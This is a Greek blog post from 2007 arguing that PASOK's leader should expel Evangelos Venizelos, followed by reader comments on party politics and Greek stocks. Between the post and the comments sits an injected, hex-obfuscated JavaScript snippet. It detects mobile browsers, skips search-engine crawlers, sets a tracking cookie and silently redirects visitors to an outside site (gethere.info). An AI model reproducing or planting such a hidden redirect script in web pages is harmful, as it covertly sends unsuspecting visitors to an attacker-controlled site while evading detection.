anwnymous

Σεπτεμβρίου 25, 2007

Ανακάλυψα κάτι…

Filed under: Uncategorized — thelastrealanwnymous @ 7 :38 μμ

Δεν χωνεύω την τι βι και το ξέρετε.

Μας έχουν χορηγήσει οβερντόζ  «Πασόκ »  αυτές τις μέρες και την πάτησα και ασχολήθηκα.  Ανακάλυψα λοιπόν κάτι διαγραφές που είχε κάνει στη Θεσσαλονίκη ο ντάντι Παπανδρέου (ο Ανδρέας ) το 82 μάλλον.

Διέγραψε τότε 2-3 χιλιάδες άτομα – ομαδική σφαγή- και αυτοί ονόμασαν τον ομαδικό τους τάφο Κίνηση Πασόκ. Προσπάθησαν, έβγαλαν περιοδικά , διαμαρτυρίες , μανιφέστα με απόψεις … αλλά κανείς δεν συγκινήθηκε : ούτε οι Πασόκ ούτε οι υπόλοιποι έλληνες. 

 Τότε ; έκανε τον γύρο της χώρας και η φράση ; «όποιος δεν γουστάρει να κατεβεί από το τρένο».   

Αυτά για την ιστορία .Στο σήμερα τώρα : Η κοινή λογική λέει . Αν διαγράψει τον Βενιζέλο «από τη Θεσσαλονίκη»  ο Γιώργος θα δείξει κύρος , θα δυναμώσει το αχνό προφίλ του , θα αποδείξει ότι είναι ηγέτης σαν τον πατέρα του , θα έχει τον σεβασμό όλων και μπορεί να κερδίσει και τις επόμενες εκλογές . Αυτά τα «δημοκρατικά» και οι «ενωτικές διαδικασίες» δείχνουν αδυναμία να επιβληθεί και ηττοπάθεια.

Ο κόσμος δεν μασάει με τέτοιες «ψευδοϋπεράνω» κινήσεις πλέον.  

  Ότι και να συμβεί μετά την διαγραφή του Βενιζέλου θα είναι υπέρ του Γιώργου . Κανένα «ποντίκι» δεν θα τρέξει με τον διαγραμμένο , όταν  «το πλοίο του» θα αρχίσει να βάζει νερά. 

Αν ο Γιώργος θέλει να κυβερνήσει πρέπει να πατήσει στο πτώμα του Βενιζέλου.  

Απόσπασμα από τα «Μαθήματα ηγεσίας»  

  (είσαστε τυχεροί που σας δίνω τα καλύτερα κομμάτια  δωρεάν )

J  J 

akaras1979@yahoo.gr

var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Advertisements

34 Σχόλια »

  1. Κατ’αρχή ευχαριστούμε για τα «καλύτερα κομμάτια δωρεάν»
    Οντως , τότε είχαν κατέβει αρκετοί απο το τρένο….
    δηλ. το ανεβοκατέβασμα στο τρένο δεν σταμάτησε ποτέ..και φυσικά δεν ήταν μόνο το τρένο Πασοκ…που να δείς στα τρένα της Αριστεράς τι γινόταν…πανζουρλισμός..

    Αυτά τα τρένα χωρίς κατεύθυνση και προορισμό πληρώνουμε μέχρι και σήμερα, υπο μία έννοια.

    Η πρόταση σου να διαγράψει ο Γιώργος τον Μπένι
    είναι λίγο ανεδαφική γιατί απλούστατα δεν βρισκόμαστε 25 χρόνια πριν!.

    Υπό άλλη έννοια είναι τόσο απλό!

    Για ξαναδιάβασε τα μαθήματα ηγεσίας μήπως λέει κάτι για αυτό…

    Σχόλιο από takis — Σεπτεμβρίου 25, 2007 @ 10 :38 μμ | Απάντηση

  2. thelw kai egw ta mathhmata hgesias…
    Ο κόσμος δεν μασάει με τέτοιες «ψευδοϋπεράνω» κινήσεις πλέον????eisai sigouros?edw masaei alla kai ta katapinei kiolas..

    p.s. giati blepeis thleorash afou se xalaei?

    Σχόλιο από blue — Σεπτεμβρίου 26, 2007 @ 3 :13 πμ | Απάντηση

  3. Αν τακτικές σαν αυτές θεωρούνται οπισθοδρομικές, τι είναι αυτό που μας κάνει να φαινόμαστε διαφορετικοί και ίσως προοδευτικοί στη πολιτική ζωή και στη καθημερινότητά μας; Οι ψήφοι δια βοής; Κι αν ο Ευάγγελος και όποιος άλλος, κρίνουν σκόπιμη την επανίδρυση του κόμματος γιατί δεν σαλτάρουν από το καράβι; Τι σόι ηγέτες είναι και τι ρεύμα έχουν; Αλλά έλα που τα πρόβατα δεν ξέρουν κολύμπι…

    Σχόλιο από LikeToBite — Σεπτεμβρίου 26, 2007 @ 12 :22 μμ | Απάντηση

  4. taki
    αναλαμβάνω εγώ απο το 2008 στο γραφειο και αναγκαστικά πρέπει να μάθω να διοικώ .
    δυστυχώς με το καλημερα έμαθα ότι για να σε σέβονται και να εχεις το απαραίτητο κύρος, πρέπει να εκτελούνται οι αποφάσεις σου , και αν δεν υπαρχει δήμιος στην επιχείρηση για να τις εκτελέσει ,ο δήμιος γίνεσαι εσύ.
    σκεφτόμουν λοιπόν τι αμερικανιές είναι αυτές και τι ξενέρωτες σκεψεις ,όταν …ανακάλυψα ότι πρώτος διδάξας ήταν ο Ανδρές (ο παπανδρέου ντε)
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 26, 2007 @ 6 :23 μμ | Απάντηση

  5. dear blue
    my sweet blue
    ο κόσμος δεν μασάει γι αυτό και έκανε την εξής τριπλα σ’ αυτές τις εκλογές .
    ενώ συνήθως τιμωρούσε τη ΝΔ ψηφίζοντας Πασόκ , και το Πασόκ ψηφίζοντας ΝΔ .
    Τώρα
    ψήφισε ΝΔ γιατί ήθελε να είναι ο νικητής του δικοματισμού και ψήφισε μικρά κόμματα για να τιμωρήσει το Πασόκ .
    Ουσιαστικά πάλι δικοματισμό έχουμε, απλά γέμισε και μικρούς η βουλή για να τιμωρηθεί το Πασόκ.
    Μισώ την τι βι και το ξέρετε
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 26, 2007 @ 6 :28 μμ | Απάντηση

  6. like to bite
    θένκς που το είδες απο την πλευρά του Βενιζέλου.
    δεν το είχα σκεφτεί έτσι.
    Αν έχει τα κότσια ας παρει τις μέλισσές του για να ανανεωθεί η κυψέλη.
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 26, 2007 @ 6 :31 μμ | Απάντηση

  7. μαθηματα ηγεσίας (απο τις σημερινές ειδήσεις)

    «Ο πρόεδρος και διευθύνων σύμβουλος του ΟΤΕ Παναγής Βουρλούμης αναλαμβάνει καθήκοντα προέδρου και διευθύνοντος συμβούλου της Cosmote μετά τη χθεσινή παραίτηση του κ. Ευάγγελου Μαρτιγόπουλου. «Το άκρως ανταγωνιστικό περιβάλλον, οι συνεχείς εξελίξεις στις τηλεπικοινωνίες και κυρίως η επερχόμενη σύγκλιση υπαγορεύουν στον Όμιλο του ΟΤΕ ενιαία στρατηγική», τόνισε ο κ. Βουρλούμης.»

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 26, 2007 @ 6 :45 μμ | Απάντηση

  8. Εδώ ανέχθηκε σαν συνομιλήτρια τη Δήμητρα τί λέμε τώρα; Λείπω μέρες και από σήμερατο βράδυ παρακολουθώ το πανηγύρι που έχιε ξεκινήσει. Νομίζω ότι εκεί στο Πασόκ τα έχουν χάσει πραγματικά. Βλέπω ειδήσεις στο Mega τώρα και έχω μείνει έκπληκτη από την αδυναμία τους να αντιδράσουν στα αυτονόητα.
    Ότι δηλαδή στην πολιτική υπάρχουν και εκπλήξεις.

    Σχόλιο από So_Far — Σεπτεμβρίου 26, 2007 @ 8 :29 μμ | Απάντηση

  9. so far
    ας μη θυμόμαστε τα παλιά .
    η Δήμητρα ήταν «η αχίλλειος φτέρνα» του Ανδρέα.
    το ερώτημα παραμένει : θα μπορέσει ο Γιώργος να αφαιρέσει χειρουργικά το «ενοχλητικό κομμάτι» του Βενιζέλου?
    🙂 🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 27, 2007 @ 10 :12 πμ | Απάντηση

  10. Ούτε θα μπορέσει ούτε κατά βάθος το θέλει.
    Η εκκαθάριση θέλει πυγμή. Ο άνθρωπος που χ8ες πήγε στην κοινοβουλευτική ομάδα και θέλησε να μάθει ποιοί είναι μαζί του και ποιοί όχι, δεν έχει πυγμή.
    Αν είχε πυγμή θα αδιαφορούσε με ποιούς θα πάει και ποιούς θ’ αφήσει. Παίρνοντας πάνω του το κόστος της απόφασης.

    Δεν μπορώ να ξέρω τί σκέφτεται, δεν τον γνωρίζω σαν άνθρωπο αλλά νομίζω ότι αυτή τη στιγμή είναι λίγο έως και πολύ έρμαιο των άλλων και των συμφερόντων τους.

    Το άσχημο είναι ότι αυτή τη στιγμή μπορεί να κριθεί ηγετικά και τη χάνει για άλλη μια φορά. Πολλές ευκαιρίες έχει πάρει αυτό το παιδί τελικά.

    Σχόλιο από So_Far — Σεπτεμβρίου 27, 2007 @ 12 :19 μμ | Απάντηση

  11. Περιμένω την απάντησή σου και στο σχόλιό μου στο προηγούμενο ποστ. Όχι επειδή λείπω μέρες να χάνω και τα καλύτερα..

    Σχόλιο από So_Far — Σεπτεμβρίου 27, 2007 @ 12 :21 μμ | Απάντηση

  12. Δεν θα συμφωνήσω με διοίκηση μέσω «δημίων».
    Αν φτάσει κάποιος να διοικεί με απειλητικές διαταγές αργά ή γρήγορα θα καταρρεύσει το οικοδόμημα.
    Το πρόβλημα εδω ειναι οτι η κατάρρευση δεν είναι άμεσα αντιληπτή και οταν γίνεται ορατή συνήθως είναι μη αναστρέψιμη.
    Το αυταρχικό μοντέλο διοίκησης ήταν κάποτε στη μόδα αλλά εχει εγκαταλειφθεί εδω και καιρό.

    Σχόλιο από Takis — Σεπτεμβρίου 28, 2007 @ 8 :43 πμ | Απάντηση

  13. Τάκης, εντάξει να μη γίνει δήμιος αλλά να έχει και νερό στις φλέβες του αντί για αίμα; τόσο μα τόσο λαπάς;

    Αν είχε μια άποψη που καθήλωνε, ένα λόγο που ήταν ξυράφι δεν θα κουνιόταν κανείς.
    Αν – λέμε αν – είχε τη δυνατότητα να φτιάξει μηχανισμούς πάλι δεν θα δεχόταν τέτοια αμφισβήτηση.

    Αυτός σε λίγο θα προσευχηθεί και στον κήπο της Ιερουσαλήμ περιμένοντας τον Άννα και τον Καϊάφα..

    Σχόλιο από So_Far — Σεπτεμβρίου 28, 2007 @ 9 :35 πμ | Απάντηση

  14. so far
    ο Βενιζέλος δοκίμασε να τρίξει τα δόντια των αντιπαλων του το βράδυ των εκλογών και έκανε πίσω.
    τα μιντια παίζουν τον υποπτο ρόλο τους.
    ο Βενιζέλος εκανε πίσω γιατί δεν μπορούσε να ισχυριστεί (να πείσει ) ότι αντιπροσωπεύει όλο το πασόκ.
    ο Γιώργος όμως θα μπορούσε εκείνο το βραδυ να αρπαξει τη ευκαιρία και να κκκκχχχχχχ!!
    και φυσικά θα το κανει για να διασφαλίσει την ενότητα .

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 28, 2007 @ 10 :07 πμ | Απάντηση

  15. τάκη
    σε κρίσιμες φάσεις δικαιολογούνται οι εκκαθαρίσεις.
    όμως αρχίζω να πιστεύω ότι η ξενερωτη αντίδραση του γιώργου και η εκνευριστική του βραδυκινησία δείχνουν σιγουριά.
    ίσως …γιατί ζούμε στην εποχή των μπραντ νέιμ και το Βενιζέλος είναι κάπως παροχημένο στη σύγχρονη σκηνή.

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 28, 2007 @ 10 :19 πμ | Απάντηση

  16. Γράφεις «τα μιντια παίζουν τον υποπτο ρόλο τους.».
    Σωστό και δεκτό. Λόγω περιθωρίων. Αν υπήρχε σωστή παρέμβαση δεν θα είχαν κανένα ρόλο να παίξουν. Και συγνώμη είναι ντροπή και αναίρεση να βγάζει γραμμή ο Πρετεντέρης κάθε βράδυ. Ας πάνε στα σπίτια τους και ας βάλουν τον Πρετεντέρη στο polit bureau..

    Μετά, εκείνο που μου κάνει εντύπωση και αποδεικνύει περίτρανα το ρόλο του «πατερούλη» που θέλουν να έχουν πάνω από το κεφάλι τους, είναι η αντίδρασή τους προχτές με την πρόταση στην κοινοβουλευτική ομάδα.
    Ανωριμότητα, κάτι κινήσεις της πλάκας, βουβαμάρα, η Μιλένα σε ρόλο «ορντινάτσα του Κινγκ Κονγκ» , γελοία εικόνα το λιγότερο.

    Επειδή έχω ζήσει τη φάση «μην το διαλύσουμε το κόμμα τώρα» το 1987 η εικόνα τους μου προκάλεσε γέλια. Ούτε νηπιαγωγείο σε παιδική χαρά.
    Αν μη τί άλλο η πολιτική θέλει άντερα. Στο απροσδόκητο. Θέλει να έχει κάποιος τη δυνατότητα να πει «ναι σε αμφισβητώ» ή «όχι δεν σε αμφισβητώ» και φυσικά ανάληψη ευθυνών.

    Αφού το χάσμα υπάρχει και μάλλον δύσκολα θα γεφυρωθεί σε συνθήκες ενός προέδρου. Κανένας από τους δύο με την έκθεση που έχει λάβει η κατάσταση δεν μπορεί να λειτουργήσει ενωτικά.
    Εκτός αν ετοιμάζεται άλλη λύση.. υποθέτω μιλώντας καθαρά τεχνικά.

    ΥΓ Πρέπει να σου πω ότι απολαμβάνω την κουβέντα που έχουμε ανοίξει.

    Σχόλιο από So_Far — Σεπτεμβρίου 28, 2007 @ 1 :05 μμ | Απάντηση

  17. Μια απορία: κκκκκκχχχχχχχχχχχχχχ σημαίνει ότι θα τον «έπνιγε»; Αν είναι για το Βαγγέλη θα πρέπει να έχει κάνει εκπαίδευση σουμοτόρι… Δεν είναι κακία, χιούμορ κάνω

    Σχόλιο από So_Far — Σεπτεμβρίου 28, 2007 @ 4 :58 μμ | Απάντηση

  18. So Far,

    Βλέπω οτι ο Παπανδρεισμός εχει αφήσει τα ίχνη του..
    «άποψη που καθηλώνει ,λόγο ξυράφι,σκληρούς μηχανισμούς..» γιατί άραγε ?
    Αυτό θέλουμε ? Εικόνα και προσκύνημα ?

    ΠΟΛΙΤΙΚΗ θέλουμε , real politik….

    αρκετά με τις απόψεις που καθηλώνουν…
    γιατί όντως μας εχουν καθηλώσει στη γωνία …
    χρόνια τώρα.

    Σχόλιο από Takis — Οκτώβριος 1, 2007 @ 8 :32 πμ | Απάντηση

  19. Οικοδεσπότα,

    Αυτή η εποχή των εκκαθαρίσεων κάτι μου θυμίζει..
    εχει όντως αποδώσει στο παρελθόν..άνθισε η Σιβηρία…

    Σχόλιο από Takis — Οκτώβριος 1, 2007 @ 8 :36 πμ | Απάντηση

  20. So Far και Οικοσεσπότα,

    Οπως υποψιάζεστε δεν είμαι με κανένα μονομάχο…ούτε με το πλήθος που αλαλάζει στα βραδυνά παράθυρα (βλ. Πρετεντέρης κλπ)..θα ήθελα να είμαι με τα λιοντάρια, να τους δαγκώσω όλους αλλα δυστυχώς ούτε αυτό είμαι…
    είμαι αυτό που μου υπενθυμίζουν καθημερινά διάφοροι , ενας φτωχός υπάλληλος..

    Κατ’τάλλα , μαζί σας !

    Σχόλιο από Takis — Οκτώβριος 1, 2007 @ 8 :48 πμ | Απάντηση

  21. takis
    η πολιτική είναι παιχνίδι με δύσκολους κανόνες.
    χρειαζεται τόλμη και οξυδέρεκια.
    και όταν τα πράγματα δυσκολεύουν δημιουργείς εσύ καινούριους κανόνες.
    ας πούμε ο γιώργος σ’ αυτή τη φάση θα μπορούσε να «υποχωρήσει» αφήνοντας διανδρία στη θεση του. (Σιμήτη -Βενιζέλο)
    ετσι αποφεύγει αυτές τις εσωκομματικές εκλογές (που του εχουν γίνει έμμονη ιδέα, δεν τσιμπάει κανείς με τέτοιους ψευτοδημοκρατισμούς) και λειτουργεί με το διαίρει και βασίλευε και στη πρώτη ευκαιρία επιστρέφει στη θεση του.
    μια αλλη λύση είναι αυτό που έκανε το κ.κ. : στα δύσκολα εβαλε μια γυναίκα να βγαλει τη λάντζα.
    εγώ προτείνω διανδρία .
    🙂

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 1, 2007 @ 2 :38 μμ | Απάντηση

  22. σο φαρ
    θα πω για χρηματιστηριακά .
    βλέπω νερα , λιμάνια , δεή , οτε – κοσμοτέ .
    ομως… εχω μια έμμονη ιδέα.
    μετά τα 25 ευρώ της εμπορικής τράπεζας στην αγκρικολ , δεν βλέπω καμία να πουλιεται πιο ψηλα απο 25 ευρώ .
    είναι κατι σαν ψυχολογικό φράγμα.
    εκτός απο το λιμάνι Θεσσ/νικης που μπορεί να φθασει και 100 ευρώ. αν όχι σε απόλυτες τουλαχιστον με σπλιτ και αυξήσεις κεφαλαίου.
    επίσης βλέπω και το νερό θεσ/νικης με καλές προοπτικες λόγω μικρής διασποράς .
    και φυσικά δεν ξεχνώ την τρ. αττικής που ποτέ δεν ξέρεις που μπορεί να φθασει.

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 1, 2007 @ 2 :44 μμ | Απάντηση

  23. Αν κατάλαβα καλά νομίζω οτι αλλάζεις τακτική,

    μετά τις «εκκαθαρίσεις», προτείνεις διανδρία ??

    Θα αποφασίσεις τελικά τι θέλεις?
    Εκκαθαρίσεις ή διανδρία?

    (και μετά κατηγορείς τους άλλους για αναποφασιστικότητα..)

    Να σε ακούσει κακομοίρη μου η Παπαρήγα να μιλάς για λάντζα..να δεις εκκαθάριση που θα φας…

    Σχόλιο από Takis — Οκτώβριος 1, 2007 @ 3 :05 μμ | Απάντηση

  24. takis
    βλεπω πως δεν τα καταφέρνει στις αιματηρές λύσεις , άλλωστε αυτό έπρεπε να γίνει το ίδιο το βράδυ των εκλογών ή τουλάχιστον τις αμεσως επόμενες μέρες …
    🙂

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 1, 2007 @ 3 :19 μμ | Απάντηση

  25. @ takis,

    αν αυτό που έβλεπα δυο μέρες στην τηλεόραση και μιλάω για τις προγραμματικές δηλώσεις στις βουλή, ήταν εικόνα ενός κόμματος της αντιπολίτευσης τότε νομίζω ότι κάπως δικαιολογημένα μιλάω για για σκληρή στάση. Η σκληρή στάση δεν είναι απαραίτητα και προσκύνημα εικόνας. Αλλά κάποιος πρέπει να τους μαζέψει και να τους διαπαιδαγωγήσει πολιτικά τουλάχιστον.
    Η real politik αν και επιθυμητή , είναι σχεδόν ουτοπική για αυτή τη χώρα φοβάμαι.

    Για το ΠΑΣΟΚ λύση ενός ανδρός όπως έχουν τα πράγματα δεν προβλέπω. Εκτός και αν είναι ο Σκανδαλίδης. Γεγονός που μάλλον θα είναι πολύ επαναστατικό για το ΠΑΣΟΚ. Ούτε τη λύση της διανδρίας με ΓΑΠ & Ευ.Βεν. μαζί μπορώ να φανταστώ.
    Κρίνοντας από την εμπειρία της αριστεράς νομίζω ότι θέλει χρόνο και ωριμότητα για να επεξεργαστούν τη δυνατότητα να συνυπάρξουν σαν τάσεις.
    Και γράφω τάσεις και αναρωτιέμαι ότι δεν ξέρω αν υπάρχουν ιδεολογικές τάσεις εκεί μέσα. Μόνο αρχηγικές και πρωθυπουργικές τάσεις βλέπω. Δηλαδή ασυγκράτητη προσωπική φιλοδοξία & διατήρηση της οικογενειοκρατίας και του brand name από την άλλη.΄Με όραμα το Μαξίμου.
    Σκέφτομαι λοιπόν ότι το ‘μόρφωμα’ ΠΑΣΟΚ όσο άντεξε άντεξε με τις συνθήκες αυτές. Και μάλλον κάτι άλλο πρέπει να κάνει. Ας το βρει.

    Σχόλιο από So_Far — Οκτώβριος 1, 2007 @ 10 :44 μμ | Απάντηση

  26. @ thelastrealanwnymous,

    σ’ ευχαριστώ. Την Αττικής τη βλέπω σαν καθαρό τζόγο πάντως. Και για το φράγμα της Εμπορικής έχεις απόλυτο δίκιο, δεν ξεπερνιέται εύκολα.

    Σχόλιο από So_Far — Οκτώβριος 1, 2007 @ 10 :49 μμ | Απάντηση

  27. so far
    η εμμονή του γιώργου στις μεγάλες ψηφοφορίες , δείχνουν μια πρακτική επιστροφής στα χρόνια του Ανδρέα που από το μπαλκόνι απευθυνόταν στις μάζες.
    μεταλάσσεται το ντι εν ει του κόσμου όμως και όλα αυτά δεν μιλανε μέσα του.
    δεν υπάρχει χειρότερο πράγμα απο το να επιστρέφεις στα φαντάσματα του παρελθόντος για να βρεις λύσεις.
    Όμως βλέποντας και άλλα κρατη διαπιστώνω μια γενικότερη δυσκολία να αντιμετωπισθούν τα κοινωνικά προβλήματα , μια αμηχανία των κυβερνήσεων να βρουν το δρόμο τους , μια δυσπιστία να επιλέξουν συμμάχους , μια δυσκαμψία να στρέψουν τα καλά της ιδιωτικοποίησης σε μεγαλύτερες κοινωνικές ομάδες.

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 3, 2007 @ 10 :43 πμ | Απάντηση

  28. So Far,
    Μικρό τελευταίο σχόλιο απο μένα.
    1. Νομίζετε οτι το Πασοκ χρειάζεται πολιτική διαπαιδαγώγηση μετά 20 χρόνια εξουσίας ?!!
    αν είναι ετσι τότε αλλοίμονο σε όλους μας..
    δεν νομίζω οτι ειναι ετσι..απλά παίζονται τα φοβερά παιχνίδια εξουσίας….που μάλλον θα έχουν άσχημο τέλος για αυτούς και για εμάς.
    2.Η συνύπαρξη των τάσεων στην αριστερά μετά απο πολύχρονο χυμένο αίμα κατέληξε να δώσει ΣΥΡΙΖΑ και 5%.(Δεν μιλάω για ΚΚΕ γιατί εκεί 3 πουλάκια κάθονται..).
    Νάταν μόνο αυτό..βγήκε χθες ο Αλαβάνος να δηλώσει οτι δεν συμμετέχει στο διάλογο για το ασφαλιστικό…αντ’αυτού μας καλεί στους δρόμους..
    Πάω λοιπόν να ακονίσω τη μαχαίρα μου να ετοιμάσω και κανένα κονσερβοκούτι..
    λέω να ξεκινήσω απο τους χρηματιστές …τι λέτε?

    Σχόλιο από Takis — Οκτώβριος 3, 2007 @ 10 :47 πμ | Απάντηση

  29. @ thelastrealanwnymous,

    θεωρώ πως έχεις δίκιο στο θέμα των ψηφοφοριών και των μαζών. Δεν ξέρω αν αυτό είναι κάτι που το έχει παλέψει ο ίδιος μέσα του ή έχει έρθει σταλμένο από το περιβάλλον. Όπως και να έχει πάντως δείχνει έντονα την ανάγκη της καθολικής αποδοχής.
    Μόνο που ο κόσμος άλλαξε παντού. Πιστεύω από έλλειψη ιδεών που θα τους εμπνέουν αλλά και αξιόλογων μεγεθών πολιτικών προσώπων.
    Εδώ δεν μιλάμε για πολιτική αλλά για διαχείριση προβλημάτων.
    Σκέψου αυτό: στο Β’ Παγκόσμιο Πόλεμο η διαχείριση θα έλεγε «συνεργαστείτε με τον Χίτλερ». Βλέπεις όμως ότι ο κόσμος εξαθλιωμένος από πείνα αντιστάθηκε. Και μη μου πεις ότι οι ΜΑΚι στη Γαλλία, ή οι Παρτιζάνοι ή οι δικοί μας σκέφτονταν το ασφαλιστικό..

    Σχόλιο από So_Far — Οκτώβριος 5, 2007 @ 10 :43 μμ | Απάντηση

  30. @ takis,
    από τη στιγμή που σαν κόμμα εξουσίας δεν ξέρει να παίζει και τα παιχνίδια εξουσίας έξυπνα τότε θέλει διαπαιδαγώγηση. Είναι ακριβώς όπως στις δουλειές μας. Παίζουμε έξυπνα με τους όρους του παιχνιδιού μέσα από πολύ μεγάλες συγκρούσεις.
    Γι’ αυτό θέλουν πολιτική διαπαιδαγώγηση.
    Και αν θέλετε σας λέω ότι αποδέχομαι ότι είμαστε χαμένοι από χέρι, δεν είναι κάτι που το φοβάμαι πια. Έχει συμβεί.

    Όσο για το ΣΥΡΙΖΑ , εδώ μάλλον έχει επικρατήσει η άποψη ότι «με την επαναστατική γυμναστική θα σωθούμε» κρίνοντας από τα αποτελέσματα που αποδόθηκαν στις κινητοποιήσεις του χειμώνα. Αλλά δεν είναι πάντα έτσι. Βέβαια ο Αλέκος έχει και παρελθόν από ΚΝΕ και ΚΚΕ , αυτά δεν τα βγάζεις και εύκολα από πάνω σου..

    Σχόλιο από So_Far — Οκτώβριος 5, 2007 @ 10 :48 μμ | Απάντηση

  31. εύγε κλίκα!
    μαθήματα ηγεσίας!
    να κι ένας που παρέμεινε ακέραιος
    (από τοπία κάνεις τίποτα ή μπα;)

    Σχόλιο από sardonian — Οκτώβριος 12, 2007 @ 12 :16 πμ | Απάντηση

  32. πρόεδρε
    η απουσία σου είναι αισθητή .
    όσο πιο σκληρή η μαχη των διεκδικητών τόσο πιό
    ενισχυμένος βγαίνει ο νικητής
    🙂

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 12, 2007 @ 11 :55 πμ | Απάντηση

  33. Τί έγινε βρε μικρέ; έπεσε δουλειά στο stock market ? Μην αφήσεις το blogging γράφεις πολύ καλά.

    Σχόλιο από So_Far — Οκτώβριος 14, 2007 @ 7 :08 πμ | Απάντηση

  34. so far
    θενκς για την ψυχολογική υποστήριξη.
    πρέπει να εχω το λαπ τοπ στο αυτοκίνητο και ότι βλέπω να το σχολιάζω «θερμά» εκείνη τη στιγμή .
    🙂

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 15, 2007 @ 1 :57 μμ | Απάντηση


RSS feed for comments on this post. TrackBack URI

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

